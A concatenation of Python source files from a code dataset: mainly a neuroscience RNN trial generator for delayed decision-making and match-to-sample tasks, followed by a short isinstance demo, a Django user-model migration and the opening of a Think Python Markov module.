        # stim2_ons = (np.ones(batch_size)*rng.uniform(2800,3200)/dt).astype(int)
        # each batch consists of sequences of equal length
        tdim = fix_offs + int(500/dt) # longest trial
    elif mode == 'test':
        # dense, deterministic coverage: 20 locations x 5 strengths
        tdim = int(3000/dt)
        n_stim_loc, n_stim1_strength = batch_shape = 20, 5
        batch_size = np.prod(batch_shape)
        ind_stim_loc, ind_stim1_strength = np.unravel_index(range(batch_size),batch_shape)
        fix_offs = int(2700/dt)
        stim1_locs = 2*np.pi*ind_stim_loc/n_stim_loc
        stim2_locs = (stim1_locs+np.pi)%(2*np.pi)
        # strengths sum to 2 so the pair is symmetric around 1
        stim1_strengths = 1.0*ind_stim1_strength/n_stim1_strength+0.5
        stim2_strengths = 2 - stim1_strengths
        stim1_ons = int(500/dt)
        stim1_offs = int(1000/dt)
        stim2_ons = int(2000/dt)
        stim2_offs = int(2500/dt)
    elif mode == 'psychometric':
        p = kwargs['params']
        stim1_locs = p['stim1_locs']
        stim2_locs = p['stim2_locs']
        stim1_strengths = p['stim1_strengths']
        stim2_strengths = p['stim2_strengths']
        stim1_ons = int(p['stim1_ons']/dt)
        stim1_offs = int(p['stim1_offs']/dt)
        stim2_ons = int(p['stim2_ons']/dt)
        stim2_offs = int(p['stim2_offs']/dt)
        batch_size = len(stim1_locs)
        fix_offs = int(200/dt) + stim2_offs
        tdim = int(300/dt) + fix_offs
    else:
        raise ValueError('Unknown mode: ' + str(mode))
    # time to check the saccade location
    check_ons = fix_offs + int(100/dt)
    trial = Trial(config, tdim, batch_size)
    trial.add('fix_in', offs=fix_offs)
    trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, strengths=stim1_strengths, mods=stim_mod)
    trial.add('stim', stim2_locs, ons=stim2_ons, offs=stim2_offs, strengths=stim2_strengths, mods=stim_mod)
    trial.add('fix_out', offs=fix_offs)
    # target is the location of the stronger stimulus
    stim_locs = [stim1_locs[i] if (stim1_strengths[i]>stim2_strengths[i])
                 else stim2_locs[i] for i in range(batch_size)]
    trial.add('out', stim_locs, ons=fix_offs)
    trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)
    trial.epochs = {'fix1' : (None, stim1_ons),
                    'stim1' : (stim1_ons, stim1_offs),
                    'delay1' : (stim1_offs, stim2_ons),
                    'stim2' : (stim2_ons, stim2_offs),
                    'delay2' : (stim2_offs, fix_offs),
                    'go1' : (fix_offs, None)}
    return trial
def delaydm1(config, mode, **kwargs):
    """Delayed comparison in modality 1 (wrapper over _delaydm)."""
    return _delaydm(config, mode, 1, **kwargs)
def delaydm2(config, mode, **kwargs):
    """Delayed comparison in modality 2 (wrapper over _delaydm)."""
    return _delaydm(config, mode, 2, **kwargs)
def _contextdelaydm(config, mode, attend_mod, **kwargs):
    '''
    Context-dependent delayed decision making.

    Fixate whenever fixation point is shown.
    Two stimuluss are shown in each ring, separated in time.
    Saccade to the one with higher intensity for the attended ring

    Generate one batch of trials

    The fixation is shown between (0, fix_offs)
    The two stimuluss are shown between (stim1_ons, stim1_offs) and
    (stim2_ons, stim2_offs)
    The output should be fixation location for (0, fix_offs)
    Otherwise the location of the stronger stimulus in the attended modality

    In this task, if the model's strategy is to ignore context, and integrate both,
    then the maximum performance is 75%. So we need to make the highest correct performance
    much higher than that.

    :param config: dict; uses 'dt', 'rng' and optionally 'easy_task'
    :param mode: the mode of generating. Options: 'random', 'test', 'psychometric'
    :param attend_mod: 1, 2 or 'both'; which modality determines the response

    Optional parameters:
    :param batch_size: Batch size (required for mode=='random')
    :param params: a dictionary of parameters (required for mode=='psychometric')

    :return: a Trial object; its data arrays are (Time, Batchsize, Units)
    :raises ValueError: for an unknown mode or attend_mod
    '''
    dt = config['dt']
    rng = config['rng']
    if mode == 'random': # Randomly generate parameters
        batch_size = kwargs['batch_size']
        # A list of locations of stimuluss, same locations for both modalities
        stim_dist = rng.uniform(0.5*np.pi,1.5*np.pi,(batch_size,))*rng.choice([-1,1],(batch_size,))
        stim1_locs = rng.uniform(0, 2*np.pi, (batch_size,))
        stim2_locs = (stim1_locs+stim_dist)%(2*np.pi)
        stim_coh_range = np.array([0.08,0.16,0.32])
        if ('easy_task' in config) and config['easy_task']:
            stim_coh_range *= 2
        if (attend_mod == 1) or (attend_mod == 2):
            # independent strengths per modality; the attended one sets the answer
            stim1_mod1_strengths, stim2_mod1_strengths = \
                contextdm_genstim(batch_size, rng, stim_coh_range)
            stim1_mod2_strengths, stim2_mod2_strengths = \
                contextdm_genstim(batch_size, rng, stim_coh_range)
            if attend_mod == 1:
                stim1_strengths, stim2_strengths = stim1_mod1_strengths, stim2_mod1_strengths
            else:
                stim1_strengths, stim2_strengths = stim1_mod2_strengths, stim2_mod2_strengths
        else:
            # 'both': split a common strength across the two modalities
            stim1_strengths, stim2_strengths = \
                contextdm_genstim(batch_size, rng, stim_coh_range)
            # BUGFIX: draw from the seeded rng in config instead of the global
            # np.random, which ignored the experiment seed and made
            # 'both'-context trials irreproducible.
            stim1_mod12_diff = stim1_strengths * \
                rng.uniform(0.2, 0.8, (batch_size,)) * \
                rng.choice([+1, -1], (batch_size,))
            stim1_mod1_strengths = stim1_strengths + stim1_mod12_diff/2
            stim1_mod2_strengths = stim1_strengths - stim1_mod12_diff/2
            stim2_mod12_diff = stim2_strengths * \
                rng.uniform(0.2, 0.8, (batch_size,)) * \
                rng.choice([+1, -1], (batch_size,))
            stim2_mod1_strengths = stim2_strengths + stim2_mod12_diff/2
            stim2_mod2_strengths = stim2_strengths - stim2_mod12_diff/2
        # Time of stimuluss on/off
        stim1_ons = int(rng.choice([200, 400, 600])/dt)
        stim1_offs = stim1_ons + int(rng.choice([200, 400, 600])/dt)
        stim2_ons = stim1_offs + int(rng.choice([200, 400, 800, 1600])/dt)
        stim2_offs = stim2_ons + int(rng.choice([200, 400, 600])/dt)
        fix_offs = stim2_offs + int(rng.uniform(100,300)/dt)
        # each batch consists of sequences of equal length
        tdim = fix_offs + int(500/dt) # longest trial
    elif mode == 'test':
        # dense, deterministic coverage: 20 locations x 5 x 5 strengths
        n_stim_loc, n_stim_mod1_strength, n_stim_mod2_strength = batch_shape = 20, 5, 5
        batch_size = np.prod(batch_shape)
        ind_stim_loc, ind_stim_mod1_strength, ind_stim_mod2_strength = np.unravel_index(range(batch_size),batch_shape)
        stim1_locs = 2*np.pi*ind_stim_loc/n_stim_loc
        stim2_locs = (stim1_locs+np.pi)%(2*np.pi)
        # strengths sum to 2 so each pair is symmetric around 1
        stim1_mod1_strengths = 0.4*ind_stim_mod1_strength/n_stim_mod1_strength+0.8
        stim2_mod1_strengths = 2 - stim1_mod1_strengths
        stim1_mod2_strengths = 0.4*ind_stim_mod2_strength/n_stim_mod2_strength+0.8
        stim2_mod2_strengths = 2 - stim1_mod2_strengths
        stim1_ons = int(500/dt)
        stim1_offs = int(1000/dt)
        stim2_ons = int(2000/dt)
        stim2_offs = int(2500/dt)
        fix_offs = int(3000/dt)
        tdim = int(3500/dt)
    elif mode == 'psychometric':
        p = kwargs['params']
        stim1_locs = p['stim1_locs']
        stim2_locs = p['stim2_locs']
        stim1_mod1_strengths = p['stim1_mod1_strengths']
        stim2_mod1_strengths = p['stim2_mod1_strengths']
        stim1_mod2_strengths = p['stim1_mod2_strengths']
        stim2_mod2_strengths = p['stim2_mod2_strengths']
        stim1_ons = int(300/dt)
        stim1_offs = int(600/dt)
        stim2_ons = int(p['stim_time']/dt) + stim1_offs
        stim2_offs = int(300/dt) + stim2_ons
        batch_size = len(stim1_locs)
        # Time of stimuluss on/off
        fix_offs = int(200/dt) + stim2_offs
        tdim = int(300/dt) + fix_offs
    else:
        raise ValueError('Unknown mode: ' + str(mode))
    # time to check the saccade location
    check_ons = fix_offs + int(100/dt)
    if attend_mod == 1:
        stim1_strengths, stim2_strengths = stim1_mod1_strengths, stim2_mod1_strengths
    elif attend_mod == 2:
        stim1_strengths, stim2_strengths = stim1_mod2_strengths, stim2_mod2_strengths
    elif attend_mod == 'both':
        stim1_strengths = stim1_mod1_strengths + stim1_mod2_strengths
        stim2_strengths = stim2_mod1_strengths + stim2_mod2_strengths
    else:
        # ROBUSTNESS: fail loudly instead of a NameError further down
        raise ValueError('Unknown attend_mod: ' + str(attend_mod))
    trial = Trial(config, tdim, batch_size)
    trial.add('fix_in', offs=fix_offs)
    trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, strengths=stim1_mod1_strengths, mods=1)
    trial.add('stim', stim2_locs, ons=stim2_ons, offs=stim2_offs, strengths=stim2_mod1_strengths, mods=1)
    trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, strengths=stim1_mod2_strengths, mods=2)
    trial.add('stim', stim2_locs, ons=stim2_ons, offs=stim2_offs, strengths=stim2_mod2_strengths, mods=2)
    trial.add('fix_out', offs=fix_offs)
    # target is the location of the stronger stimulus in the attended modality
    stim_locs = [stim1_locs[i] if (stim1_strengths[i]>stim2_strengths[i])
                 else stim2_locs[i] for i in range(batch_size)]
    trial.add('out', stim_locs, ons=fix_offs)
    trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)
    trial.epochs = {'fix1' : (None, stim1_ons),
                    'stim1' : (stim1_ons, stim1_offs),
                    'delay1' : (stim1_offs, stim2_ons),
                    'stim2' : (stim2_ons, stim2_offs),
                    'delay2' : (stim2_offs, fix_offs),
                    'go1' : (fix_offs, None)}
    return trial
def contextdelaydm1(config, mode, **kwargs):
    """Context-dependent delayed DM, attend modality 1 (wrapper over _contextdelaydm)."""
    return _contextdelaydm(config, mode, 1, **kwargs)
def contextdelaydm2(config, mode, **kwargs):
    """Context-dependent delayed DM, attend modality 2 (wrapper over _contextdelaydm)."""
    return _contextdelaydm(config, mode, 2, **kwargs)
def multidelaydm(config, mode, **kwargs):
    """Multi-sensory delayed DM, integrate both modalities (wrapper over _contextdelaydm)."""
    return _contextdelaydm(config, mode, 'both', **kwargs)
def dms_(config, mode, matchnogo, **kwargs):
    '''
    Delay-match-to-sample

    Two stimuli are shown, separated in time, either at the same location or not
    Fixate before the second stimulus is shown

    If matchnogo is one, then:
    If the two stimuli are the same, then keep fixation.
    If the two stimuli are different, then saccade to the location of the stimulus

    If matchnogo is zero, then:
    If the two stimuli are different, then keep fixation.
    If the two stimuli are the same, then saccade to the location of the stimulus

    The first stimulus is shown between (stim1_ons, stim1_offs)
    The second stimulus is shown between (stim2_ons, T)
    The output should be fixation location for (0, stim2_ons)
    If two stimuli are at different locations, then for (stim2_ons, T) go to stim2 location
    Otherwise keep fixation

    :param config: dict; uses 'dt' and 'rng'
    :param mode: the mode of generating. Options: 'random', 'test', 'psychometric'
    :param matchnogo: 1 -> match means no-go; 0 -> non-match means no-go

    Optional parameters:
    :param batch_size: Batch size (required for mode=='random')
    :param params: a dictionary of parameters (required for mode=='psychometric')

    :return: a Trial object; its data arrays are (Time, Batchsize, Units)
    '''
    dt = config['dt']
    rng = config['rng']
    if mode == 'random': # Randomly generate parameters
        batch_size = kwargs['batch_size']
        stim1_mod = rng.choice([1,2])
        stim2_mod = rng.choice([1,2])
        # A list of locations of stimuluss
        # Since stim1 is always shown first, it's important that we completely randomize their relative positions
        matchs = rng.choice([0,1],(batch_size,)) # match or not?
        # stim_dist range between 1/18*pi and (2-1/18*pi), corresponding to 10 degree to 350 degree
        stim_dist = rng.uniform(np.pi/9,np.pi*17./9.,(batch_size,))*rng.choice([-1,1],(batch_size,))
        stim1_locs = rng.uniform(0, 2*np.pi, (batch_size,))
        # match trials reuse stim1's location (stim_dist*0), non-match trials offset it
        stim2_locs = (stim1_locs+stim_dist*(1-matchs))%(2*np.pi)
        # Time of stimuluss on/off
        stim1_ons = int(rng.choice([200, 400, 600])/dt)
        stim1_offs = stim1_ons + int(rng.choice([200, 400, 600])/dt)
        stim2_ons = stim1_offs + int(rng.choice([200, 400, 800, 1600])/dt)
        tdim = stim2_ons + int(500/dt)
    elif mode == 'test':
        # Set this test so the model always respond
        n_stim_loc, n_mod1, n_mod2 = batch_shape = 20, 2, 2
        batch_size = np.prod(batch_shape)
        ind_stim_loc, ind_mod1, ind_mod2 = np.unravel_index(range(batch_size),batch_shape)
        stim1_mod = ind_mod1 + 1
        stim2_mod = ind_mod2 + 1
        stim1_locs = 2*np.pi*ind_stim_loc/n_stim_loc
        matchs = (1 - matchnogo)*np.ones(batch_size) # make sure the response is Go
        stim2_locs = (stim1_locs+np.pi*(1-matchs))%(2*np.pi)
        stim1_ons = int(500/dt)
        stim1_offs = stim1_ons + int(500/dt)
        stim2_ons = stim1_offs + int(1200/dt)
        tdim = stim2_ons + int(500/dt)
    elif mode == 'psychometric':
        p = kwargs['params']
        stim1_locs = p['stim1_locs']
        stim2_locs = p['stim2_locs']
        matchs = get_dist(stim1_locs-stim2_locs)<np.pi/36. # 5 degree
        batch_size = len(stim1_locs)
        tdim = int(2500/dt)
        stim1_ons = int(500/dt)
        stim1_offs = int(800/dt)
        stim2_ons = int(2000/dt)
        stim1_mod = 1
        stim2_mod = 1
    else:
        raise ValueError('Unknown mode: ' + str(mode))
    # time to check the saccade location
    check_ons = stim2_ons + int(100/dt)
    trial = Trial(config, tdim, batch_size)
    trial.add('fix_in')
    trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, mods=stim1_mod)
    trial.add('stim', stim2_locs, ons=stim2_ons, mods=stim2_mod)
    # stim2_ons may be per-trial (iterable) or shared (scalar)
    if hasattr(stim2_ons, '__iter__'):
        fix_out_offs = list(stim2_ons)
    else:
        fix_out_offs = [stim2_ons]*batch_size
    out_offs = [None]*batch_size
    for i in range(batch_size):
        if matchs[i] == matchnogo: # this trial is a no-go
            fix_out_offs[i] = None # Keep fixation
            out_offs[i] = 0 # And don't go to stimulus location
    trial.add('fix_out', offs=fix_out_offs)
    trial.add('out', stim2_locs, ons=stim2_ons, offs=out_offs)
    trial.add_c_mask(pre_offs=stim2_ons, post_ons=check_ons)
    trial.epochs = {'fix1' : (None, stim1_ons),
                    'stim1' : (stim1_ons, stim1_offs),
                    'delay1' : (stim1_offs, stim2_ons),
                    'go1' : (stim2_ons, None)}
    return trial
def dmsgo(config, mode, **kwargs):
    """Delay-match-to-sample, go on match (wrapper over dms_)."""
    return dms_(config, mode, 0, **kwargs)
def dmsnogo(config, mode, **kwargs):
    """Delay-match-to-sample, go on non-match (wrapper over dms_)."""
    return dms_(config, mode, 1, **kwargs)
def dmc_(config, mode, matchnogo, **kwargs):
    '''
    Delay-match-to-category

    Two stimuli are shown, separated in time, either at locations of the same
    category (both < pi, or both >= pi) or not.
    Fixate before the second stimulus is shown

    If matchnogo is one, then:
    If the two categories are the same, then keep fixation.
    If the two categories are different, then saccade to the location of the stimulus

    If matchnogo is zero, then:
    If the two categories are different, then keep fixation.
    If the two categories are the same, then saccade to the location of the stimulus

    The first stimulus is shown between (stim1_ons, stim1_offs)
    The second stimulus is shown between (stim2_ons, T)

    :param config: dict; uses 'dt' and 'rng'
    :param mode: the mode of generating. Options: 'random', 'test', 'psychometric'
    :param matchnogo: 1 -> category match means no-go; 0 -> non-match means no-go

    Optional parameters:
    :param batch_size: Batch size (required for mode=='random')
    :param params: a dictionary of parameters (required for mode=='psychometric')

    :return: a Trial object; its data arrays are (Time, Batchsize, Units)
    '''
    dt = config['dt']
    rng = config['rng']
    if mode == 'random': # Randomly generate parameters
        batch_size = kwargs['batch_size']
        # each batch consists of sequences of equal length
        stim1_mod = rng.choice([1,2])
        stim2_mod = rng.choice([1,2])
        # A list of locations of stimuluss, drawn from ten fixed exemplars
        # (five per category). Since stim1 is always shown first, their
        # relative positions are fully randomized.
        stim1_locs = rng.choice(np.array([0.1, 0.3, 0.5, 0.7, 0.9, 1.1, 1.3, 1.5, 1.7, 1.9])*np.pi,size=(batch_size,))
        stim2_locs = rng.choice(np.array([0.1, 0.3, 0.5, 0.7, 0.9, 1.1, 1.3, 1.5, 1.7, 1.9])*np.pi,size=(batch_size,))
        # Time of stimuluss on/off
        stim1_ons = int(rng.choice([200, 400, 600])/dt)
        stim1_offs = stim1_ons + int(rng.choice([200, 400, 600])/dt)
        stim2_ons = stim1_offs + int(rng.choice([200, 400, 800, 1600])/dt)
        tdim = stim2_ons + int(rng.choice([200, 400, 600])/dt)
    elif mode == 'test':
        # Set this test so the model always respond
        n_stim_loc, n_mod1, n_mod2 = batch_shape = 20, 2, 2
        batch_size = np.prod(batch_shape)
        ind_stim_loc, ind_mod1, ind_mod2 = np.unravel_index(range(batch_size),batch_shape)
        stim1_mod = ind_mod1 + 1
        stim2_mod = ind_mod2 + 1
        # BUGFIX: integer (floor) division; the Python-2 leftover n_stim_loc/2
        # is a float in Python 3 and fed a float stop into np.arange.
        # Values are unchanged.
        n_stim_loc2 = n_stim_loc//2
        # half the locations in (0.1, 0.9)*pi (category 1), half in (1.1, 1.9)*pi
        stim1_locs_ = np.concatenate(((0.1+0.8*np.arange(n_stim_loc2)/n_stim_loc2),
                                      (1.1+0.8*np.arange(n_stim_loc2)/n_stim_loc2)))*np.pi
        # fancy indexing replaces the equivalent list comprehension
        stim1_locs = stim1_locs_[ind_stim_loc]
        matchs = (1 - matchnogo)*np.ones(batch_size) # make sure the response is Go
        stim2_locs = (stim1_locs+np.pi*(1-matchs))%(2*np.pi)
        stim1_ons = int(500/dt)
        stim1_offs = stim1_ons + int(500/dt)
        stim2_ons = stim1_offs + int(1200/dt)
        tdim = stim2_ons + int(500/dt)
    elif mode == 'psychometric':
        p = kwargs['params']
        stim1_locs = p['stim1_locs']
        stim2_locs = p['stim2_locs']
        batch_size = len(stim1_locs)
        tdim = int(2500/dt)
        stim1_ons = int(500/dt)
        stim1_offs = int(800/dt)
        stim2_ons = int(2000/dt)
        stim1_mod = 1
        stim2_mod = 1
    else:
        raise ValueError('Unknown mode: ' + str(mode))
    # time to check the saccade location
    check_ons = stim2_ons + int(100/dt)
    # Category membership decides match, not the exact locations
    stim1_cats = stim1_locs<np.pi # Category of stimulus 1
    stim2_cats = stim2_locs<np.pi # Category of stimulus 2
    matchs = stim1_cats==stim2_cats
    trial = Trial(config, tdim, batch_size)
    trial.add('fix_in')
    trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, mods=stim1_mod)
    trial.add('stim', stim2_locs, ons=stim2_ons, mods=stim2_mod)
    # stim2_ons may be per-trial (iterable) or shared (scalar)
    if hasattr(stim2_ons, '__iter__'):
        fix_out_offs = list(stim2_ons)
    else:
        fix_out_offs = [stim2_ons]*batch_size
    out_offs = [None]*batch_size
    for i in range(batch_size):
        if matchs[i] == matchnogo: # this trial is a no-go
            fix_out_offs[i] = None # Keep fixation
            out_offs[i] = 0 # And don't go to stimulus location
    trial.add('fix_out', offs=fix_out_offs)
    trial.add('out', stim2_locs, ons=stim2_ons, offs=out_offs)
    trial.add_c_mask(pre_offs=stim2_ons, post_ons=check_ons)
    trial.epochs = {'fix1' : (None, stim1_ons),
                    'stim1' : (stim1_ons, stim1_offs),
                    'delay1' : (stim1_offs, stim2_ons),
                    'go1' : (stim2_ons, None)}
    return trial
def dmcgo(config, mode, **kwargs):
    """Delay-match-to-category, go on category match (wrapper over dmc_)."""
    return dmc_(config, mode, 0, **kwargs)
def dmcnogo(config, mode, **kwargs):
    """Delay-match-to-category, go on category non-match (wrapper over dmc_)."""
    return dmc_(config, mode, 1, **kwargs)
def oic(config, mode, **kwargs):
    '''
    One-interval categorization

    A sample stimulus is shown on ring 1 for 1000ms, after which two target
    stimuluss appear on rings 2 and 3. Samples with location < pi are
    reported at the ring-3 target location, all others at the ring-2 target.

    :param config: dict; uses 'dt' and 'rng'
    :param mode: the mode of generating. Options: 'random', 'test', 'psychometric'
    Optional parameters:
    :param batch_size: Batch size (required for mode=='random')
    :param params: a dictionary of parameters (required for mode=='psychometric')
    :return: a Trial object; its data arrays are (Time, Batchsize, Units)
    '''
    dt = config['dt']
    rng = config['rng']

    if mode == 'random':
        batch_size = kwargs['batch_size']
        # Sample drawn from ten fixed exemplars, five per category
        sample_locs = rng.choice(np.array([0.1, 0.3, 0.5, 0.7, 0.9, 1.1, 1.3, 1.5, 1.7, 1.9])*np.pi,size=(batch_size,))
        # Two opposite target ("color") locations on rings 2 and 3
        ring2_locs = rng.uniform(0, 2*np.pi, (batch_size,))
        ring3_locs = (ring2_locs + np.pi) % (2*np.pi)
        sample_ons = int(rng.uniform(100, 600)/dt)
        fix_offs = sample_ons + int(1000/dt)
        tdim = fix_offs + int(500/dt)
    elif mode == 'test':
        batch_size = a = 128
        # Dense sweep over both category halves
        sample_locs = np.concatenate(((0.1+0.8*np.arange(a)/a),(1.1+0.8*np.arange(a)/a)))*np.pi
        ring2_locs = sample_locs
        ring3_locs = (ring2_locs + np.pi) % (2*np.pi)
        sample_ons = int(500/dt)
        fix_offs = sample_ons + int(1000/dt)
        tdim = fix_offs + int(500/dt)
    elif mode == 'psychometric':
        p = kwargs['params']
        sample_locs = p['stim1_locs']
        ring2_locs = p['stim2_locs']
        ring3_locs = p['stim3_locs']
        batch_size = len(sample_locs)
        sample_ons = int(500/dt)
        fix_offs = sample_ons + int(1000/dt)
        tdim = fix_offs + int(500/dt)
    else:
        raise ValueError('Unknown mode: ' + str(mode))

    # when the saccade location is evaluated
    check_ons = fix_offs + int(100/dt)
    # category of the sample stimulus
    is_cat1 = sample_locs < np.pi

    trial = Trial(config, tdim, batch_size)
    trial.add('fix_in')
    trial.add('stim', sample_locs, ons=sample_ons, mods=1)
    trial.add('stim', ring2_locs, ons=fix_offs, mods=2)
    trial.add('stim', ring3_locs, ons=fix_offs, mods=3)

    # Response goes to ring 3 for category-1 samples, ring 2 otherwise
    resp_locs = [ring3_locs[i] if is_cat1[i] else ring2_locs[i]
                 for i in range(batch_size)]
    trial.add('fix_out', offs=fix_offs)
    trial.add('out', resp_locs, ons=fix_offs)
    trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)

    trial.epochs = {'fix1' : (None, sample_ons),
                    'stim1' : (sample_ons, fix_offs),
                    'go1' : (fix_offs, None)}
    return trial
def delaymatchcategory_original(config, mode, **kwargs):
    '''
    Delay-match-to-category.
    Tailored to the Freedman experiment. Notably some intervals are fixed during training
    Two or three stimuli are shown in ring 1, separated in time, either at the locations of the same category or not
    Fixate before the second stimulus is shown
    If the two stimuli are different, then keep fixation.
    If the two stimuli are match, then saccade to the location of the stimulus
    The first stimulus is shown between (stim1_on, stim1_off)
    The second stimulus is shown between (stim2_on, T)
    :param mode: the mode of generating. Options: 'random', 'explicit'...
    Optional parameters:
    :param batch_size: Batch size (required for mode=='random')
    :param tdim: dimension of time (required for mode=='sample')
    :param param: a dictionary of parameters (required for mode=='explicit')
    :return: 2 Tensor3 data array (Time, Batchsize, Units)
    '''
    dt = config['dt']   # time-step length in ms; all times below are in steps
    rng = config['rng']
    if mode == 'random': # Randomly generate parameters
        batch_size = kwargs['batch_size']
        # each batch consists of sequences of equal length
        # Use only ring 1 for stimulus input to be consistent with OIC
        # Locations are drawn from 10 fixed angles, 5 per category
        # (below/above pi -- see stim1_cats below).
        stim1_locs = rng.choice(np.array([0.1, 0.3, 0.5, 0.7, 0.9, 1.1, 1.3, 1.5, 1.7, 1.9])*np.pi,size=(batch_size,))
        stim2_locs = rng.choice(np.array([0.1, 0.3, 0.5, 0.7, 0.9, 1.1, 1.3, 1.5, 1.7, 1.9])*np.pi,size=(batch_size,))
        # Time of stimuluss on/off
        stim1_ons = int(rng.uniform(100,600)/dt)
        stim1_offs = stim1_ons + int(1000/dt)   # fixed 1s stim1 presentation
        stim2_ons = stim1_offs + int(1000/dt)   # fixed 1s delay
        tdim = stim2_ons + int(500/dt)
    elif mode == 'test':
        # Set this test so the model always respond
        # stim2 == stim1, so every trial is a match trial.
        batch_size = a = 128
        stim1_locs = np.concatenate(((0.1+0.8*np.arange(a)/a),(1.1+0.8*np.arange(a)/a)))*np.pi
        stim2_locs = stim1_locs
        stim1_ons = int(500/dt)
        stim1_offs = stim1_ons + int(1000/dt)
        stim2_ons = stim1_offs + int(rng.uniform(800,1200)/dt)
        tdim = stim2_ons + int(500/dt)
    elif mode == 'psychometric':
        # Locations supplied explicitly by the caller; fixed timing.
        p = kwargs['params']
        stim1_locs = p['stim1_locs']
        stim2_locs = p['stim2_locs']
        batch_size = len(stim1_locs)
        tdim = int(3000/dt)
        stim1_ons = int(500/dt)
        stim1_offs = int(1500/dt)
        stim2_ons = int(2500/dt)
    else:
        raise ValueError('Unknown mode: ' + str(mode))
    # time to check the saccade location
    check_ons = stim2_ons + int(100/dt)
    stim1_cats = stim1_locs<np.pi # Category of stimulus 1
    stim2_cats = stim2_locs<np.pi # Category of stimulus 2
    matchs = stim1_cats==stim2_cats
    trial = Trial(config, tdim, batch_size)
    trial.add('fix_in')
    trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, mods=1)
    trial.add('stim', stim2_locs, ons=stim2_ons, mods=1)
    # stim2_ons may be scalar (shared across batch) or per-trial iterable.
    if hasattr(stim2_ons, '__iter__'):
        fix_out_offs = list(stim2_ons)
    else:
        fix_out_offs = [stim2_ons]*batch_size
    out_offs = [None]*batch_size
    for i in range(batch_size):
        if matchs[i] == 0: # If non-match
            fix_out_offs[i] = None # Keep fixation
            out_offs[i] = 0 # And don't go to stimulus location
    trial.add('fix_out', offs=fix_out_offs)
    trial.add('out', stim2_locs, ons=stim2_ons, offs=out_offs)
    trial.add_c_mask(pre_offs=stim2_ons, post_ons=check_ons)
    trial.epochs = {'fix1' : (None, stim1_ons),
                    'stim1' : (stim1_ons, stim1_offs),
                    'delay1' : (stim1_offs, stim2_ons),
                    'go1' : (stim2_ons, None)}
    return trial
# Map from rule name (str) to the trial-generating function defined above.
rule_mapping = {'testinit': test_init,
                'fdgo': fdgo,
                'reactgo': reactgo,
                'delaygo': delaygo,
                'fdanti': fdanti,
                'reactanti': reactanti,
                'delayanti': delayanti,
                'dm1': dm1,
                'dm2': dm2,
                'contextdm1': contextdm1,
                'contextdm2': contextdm2,
                'multidm': multidm,
                'delaydm1': delaydm1,
                'delaydm2': delaydm2,
                'contextdelaydm1': contextdelaydm1,
                'contextdelaydm2': contextdelaydm2,
                'multidelaydm': multidelaydm,
                'dmsgo': dmsgo,
                'dmsnogo': dmsnogo,
                'dmcgo': dmcgo,
                'dmcnogo': dmcnogo,
                'oic': oic,
                'dmc': delaymatchcategory_original}

# Human-readable display name for each rule (e.g. for plots and logs).
rule_name = {'reactgo': 'RT Go',
             'delaygo': 'Dly Go',
             'fdgo': 'Go',
             'dm1': 'DM 1',
             'dm2': 'DM 2',
             'contextdm1': 'Ctx DM 1',
             'contextdm2': 'Ctx DM 2',
             'multidm': 'MultSen DM',
             'delaydm1': 'Dly DM 1',
             'delaydm2': 'Dly DM 2',
             'contextdelaydm1': 'Ctx Dly DM 1',
             'contextdelaydm2': 'Ctx Dly DM 2',
             'multidelaydm': 'MultSen Dly DM',
             'reactanti': 'RT Anti',
             'delayanti': 'Dly Anti',
             'fdanti': 'Anti',
             'dmsgo': 'DMS',
             'dmsnogo': 'DNMS',
             'dmcgo': 'DMC',
             'dmcnogo': 'DNMC',
             'oic': '1IC',
             'dmc': 'DMC'
             }
def generate_trials(rule, hp, mode, noise_on=True, **kwargs):
    """Generate one batch of data.

    Args:
        rule: str (or iterable of str after replace_rule), the rule for this batch
        hp: dictionary of hyperparameters
        mode: str, the mode of generating. Options: random, test, psychometric
        noise_on: bool, whether input noise is added to the trial input

    Optional kwargs:
        rule_on / rule_off: time steps at which the rule input turns on/off
        replace_rule: rule name(s) to use for the rule input channel
        rule_strength: scalar (single rule) or list, strength per rule input

    Return:
        trial: Trial class instance, containing input and target output
    """
    config = hp
    trial = rule_mapping[rule](config, mode, **kwargs)

    # Rule-input timing; None lets trial.add_rule use its defaults.
    rule_on = kwargs.get('rule_on')
    rule_off = kwargs.get('rule_off')

    # overwrite current rule for input
    if 'replace_rule' in kwargs:
        rule = kwargs['replace_rule']

    # BUG FIX: was `rule is 'testinit'` -- identity comparison against a
    # string literal is unreliable (and a SyntaxWarning on Python 3.8+).
    if rule == 'testinit':
        # Add no rule
        return trial

    if isinstance(rule, six.string_types):
        # rule is a single string; expand it (and its strength) to lists
        rule_strength = [kwargs.get('rule_strength', 1.)]
        rule = [rule]
    else:
        if 'rule_strength' in kwargs:
            rule_strength = kwargs['rule_strength']
        else:
            rule_strength = [1.] * len(rule)

    for r, s in zip(rule, rule_strength):
        trial.add_rule(r, on=rule_on, off=rule_off, strength=s)

    if noise_on:
        trial.add_x_noise()
    return trial
|
def test3():
    """Demonstrate isinstance checking against dict with a sample mapping."""
    sample = {5: 5}
    message = 'a is dic' if isinstance(sample, dict) else 'a is not dic'
    print(message)
19,235 | 9619b7a80ab35a5e2f8af2e88a403fee49e2d806 | # Generated by Django 3.1.1 on 2020-09-03 19:11
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds an optional full_name and a required phone field to CustomUser,
    # and re-declares the name field as a 20-char CharField.

    dependencies = [
        ('users', '0003_auto_20200903_1851'),
    ]

    operations = [
        migrations.AddField(
            model_name='customuser',
            name='full_name',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='customuser',
            name='phone',
            # default='' is only used to backfill existing rows during the
            # migration (preserve_default=False drops it afterwards).
            field=models.CharField(default='', max_length=13),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='customuser',
            name='name',
            field=models.CharField(max_length=20),
        ),
    ]
|
19,236 | 462cf4e1d96184c98e9f0ef552b28ac686af0ff1 | """This module contains a code example related to
Think Python, 2nd Edition
by Allen Downey
http://thinkpython2.com
Copyright 2015 Allen Downey
License: http://creativecommons.org/licenses/by/4.0/
"""
from __future__ import print_function, division
import sys
import string
import random
class Markov:
